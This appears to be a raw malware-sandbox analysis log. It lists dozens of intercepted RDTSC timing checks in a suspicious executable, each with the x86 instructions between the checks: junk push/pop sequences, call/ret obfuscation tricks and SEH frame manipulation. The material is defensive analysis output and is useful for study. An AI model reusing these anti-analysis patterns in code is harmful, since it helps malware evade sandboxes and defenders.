Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F75E23 second address: F75E42 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1174CFE2C7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F75E42 second address: F75E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F75F1E second address: F75F23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F75F23 second address: F75F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F75F29 second address: F75F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1174CFE2C8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F75F4C second address: F75F50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F760B2 second address: F760BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F767DA second address: F767DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F76928 second address: F7692C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F76E5F second address: F76E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F76E63 second address: F76E69 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F76E69 second address: F76EDC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F11753296B4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F11753296ACh 0x00000010 nop 0x00000011 call 00007F11753296AEh 0x00000016 mov edi, dword ptr [ebp+122D36FDh] 0x0000001c pop edi 0x0000001d pushad 0x0000001e jo 00007F11753296ACh 0x00000024 or esi, dword ptr [ebp+122D2288h] 0x0000002a add al, 00000008h 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f ja 00007F11753296BFh 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F76EDC second address: F76EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F76EE0 second address: F76EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F36CF5 second address: F36CFF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1174CFE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F793D8 second address: F793F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jg 00007F11753296ACh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F79270 second address: F79283 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7A375 second address: F7A379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7AD8B second address: F7ADDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a js 00007F1174CFE2B6h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F1174CFE2B8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov esi, 42D45F10h 0x00000031 movzx esi, cx 0x00000034 push 00000000h 0x00000036 mov di, 35A3h 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F1174CFE2BCh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7ADDE second address: F7AE01 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F11753296B6h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7B79B second address: F7B7F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F1174CFE2B8h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 pushad 0x00000016 mov edi, esi 0x00000018 movzx ebx, cx 0x0000001b popad 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f jmp 00007F1174CFE2BAh 0x00000024 pop esi 0x00000025 push 00000000h 0x00000027 mov esi, dword ptr [ebp+122D1D56h] 0x0000002d xchg eax, ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 jbe 00007F1174CFE2BCh 0x00000036 ja 00007F1174CFE2B6h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7B7F0 second address: F7B819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jnp 00007F11753296ACh 0x00000011 jnl 00007F11753296A6h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7CE3E second address: F7CE51 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1174CFE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F1174CFE2B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7C04B second address: F7C056 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7F3A2 second address: F7F3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F833A7 second address: F83407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F11753296A8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 jnl 00007F11753296B7h 0x0000002c push 00000000h 0x0000002e sub dword ptr [ebp+122D2477h], ecx 0x00000034 push 00000000h 0x00000036 cmc 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b pushad 0x0000003c popad 0x0000003d pop eax 0x0000003e rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7E34A second address: F7E34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F83407 second address: F8340D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F80534 second address: F8053B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8340D second address: F83411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F824DC second address: F824E6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1174CFE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F844A1 second address: F84531 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F11753296A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F11753296A8h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 nop 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F11753296A8h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 sbb edi, 4EFB9B42h 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 movzx ebx, dx 0x00000045 mov eax, dword ptr [ebp+122D0821h] 0x0000004b push edi 0x0000004c mov edi, dword ptr [ebp+122D3805h] 0x00000052 pop ebx 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ebp 0x00000058 call 00007F11753296A8h 0x0000005d pop ebp 0x0000005e mov dword ptr [esp+04h], ebp 0x00000062 add dword ptr [esp+04h], 00000016h 0x0000006a inc ebp 0x0000006b push ebp 0x0000006c ret 0x0000006d pop ebp 0x0000006e ret 0x0000006f mov edi, 4A99339Fh 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F11753296ACh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F824E6 second address: F82595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F1174CFE2B8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 sub dword ptr [ebp+1245CFB8h], ecx 0x0000002c mov ebx, dword ptr [ebp+122D37EDh] 0x00000032 mov dword ptr [ebp+122D2919h], edi 0x00000038 push dword ptr fs:[00000000h] 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F1174CFE2B8h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000015h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 mov ebx, dword ptr [ebp+122D3881h] 0x0000005f mov dword ptr fs:[00000000h], esp 0x00000066 mov ebx, dword ptr [ebp+122D36E5h] 0x0000006c mov eax, dword ptr [ebp+122D0725h] 0x00000072 sub dword ptr [ebp+122D2D58h], edi 0x00000078 push FFFFFFFFh 0x0000007a mov edi, dword ptr [ebp+122D37A1h] 0x00000080 sub di, 257Bh 0x00000085 nop 0x00000086 push eax 0x00000087 push edx 0x00000088 push eax 0x00000089 push edx 0x0000008a jg 00007F1174CFE2B6h 0x00000090 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F84531 second address: F84579 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F11753296B9h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F11753296B9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F82595 second address: F8259F instructions: 0x00000000 rdtsc 0x00000002 js 00007F1174CFE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F87296 second address: F8729A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8259F second address: F825C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1174CFE2C7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F892F7 second address: F89314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11753296B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F89314 second address: F8931D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8931D second address: F89325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F89325 second address: F8932D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8932D second address: F89349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F11753296B0h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F89349 second address: F89355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1174CFE2B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F898F8 second address: F898FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8A9D4 second address: F8A9D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8A9D9 second address: F8A9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8A9DF second address: F8A9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F1174CFE2B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8C9D3 second address: F8CA18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b mov edx, dword ptr [ebp+122D1C0Bh] 0x00000011 mov ebx, dword ptr [ebp+122D37E5h] 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F11753296A8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov ebx, dword ptr [ebp+122D3869h] 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 pop eax 0x00000042 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F89AB6 second address: F89ABC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F89ABC second address: F89AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F89AC2 second address: F89AD4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1174CFE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F89AD4 second address: F89ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F89ADA second address: F89ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F89ADF second address: F89AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11753296B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F874D1 second address: F874D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F89AFA second address: F89B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F11753296B5h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov ebx, dword ptr [ebp+122D3681h] 0x0000001b push esi 0x0000001c call 00007F11753296AEh 0x00000021 mov ebx, dword ptr [ebp+122D36D1h] 0x00000027 pop ebx 0x00000028 pop edi 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 sbb di, 3141h 0x00000035 mov eax, dword ptr [ebp+122D0511h] 0x0000003b and ebx, dword ptr [ebp+122D1B04h] 0x00000041 mov ebx, dword ptr [ebp+122D2876h] 0x00000047 push FFFFFFFFh 0x00000049 mov edi, dword ptr [ebp+122D2649h] 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 jbe 00007F11753296A6h 0x00000059 pop eax 0x0000005a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8E8AA second address: F8E906 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F1174CFE2B8h 0x00000011 pop edx 0x00000012 nop 0x00000013 mov bh, 1Dh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F1174CFE2B8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 xor bx, 0A0Ah 0x00000038 push eax 0x00000039 pushad 0x0000003a push ecx 0x0000003b pushad 0x0000003c popad 0x0000003d pop ecx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8E906 second address: F8E90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8DAB9 second address: F8DABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8F914 second address: F8F933 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F11753296A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8F933 second address: F8F98E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F1174CFE2B8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov di, si 0x00000025 push ebx 0x00000026 jno 00007F1174CFE2B6h 0x0000002c pop edi 0x0000002d mov dword ptr [ebp+122D5832h], ebx 0x00000033 push 00000000h 0x00000035 jmp 00007F1174CFE2BFh 0x0000003a pushad 0x0000003b mov al, ch 0x0000003d add al, FFFFFFF0h 0x00000040 popad 0x00000041 push 00000000h 0x00000043 mov dword ptr [ebp+122D1ADBh], ebx 0x00000049 push eax 0x0000004a push ecx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F8F98E second address: F8F992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F93799 second address: F9379F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F9379F second address: F937A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F97FBD second address: F97FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F97FC1 second address: F97FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F97989 second address: F979AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F1174CFE2C1h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F97AF0 second address: F97AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F97AF4 second address: F97B13 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1174CFE2B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F1174CFE2BEh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F97B13 second address: F97B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F97B18 second address: F97B3E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1174CFE2C4h 0x00000008 jp 00007F1174CFE2B6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F97B3E second address: F97B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007F11753296B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FA48D6 second address: FA48E9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1174CFE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jnl 00007F1174CFE2B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: FA48E9 second address: FA48EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
